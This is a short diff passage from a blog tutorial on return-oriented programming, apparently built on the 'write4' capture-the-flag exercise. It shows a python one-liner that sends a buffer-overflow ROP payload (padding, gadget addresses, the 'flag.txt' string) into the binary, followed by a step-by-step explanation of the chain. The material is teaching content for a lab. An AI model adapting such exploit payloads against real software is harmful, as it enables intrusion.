nihaal-prasad/nihaal-prasad.github.io/_posts/2020-10-14-return-oriented-programming-tutorial.markdown

 python -c "import sys; sys.stdout.buffer.write(b'A'*40 + b'\x90\x06\x40\x00\x00\x00\x00\x00' + b'\x28\x10\x60\x00\x00\x00\x00\x00' + b'\x66\x6c\x61\x67\x2e\x74\x78\x74' + b'\x28\x06\x40\x00\x00\x00\x00\x00')" | ./write4
 ```

-In case you still don't understand why this works, here is what is actually going on:
+In case you still don't understand this ROP chain, here is what is actually going on:
 1. Because of the buffer overflow, RIP is overwritten with `0x0000000000400690`, which is the location of the `pop r14; pop r15; ret` ROP gadget.
 2. When `pop r14` is executed, we will get `0x0000000000601028` in `r14`.
 3. When `pop r15` is executed, we will get `0x666c61672e747874` in `r15`.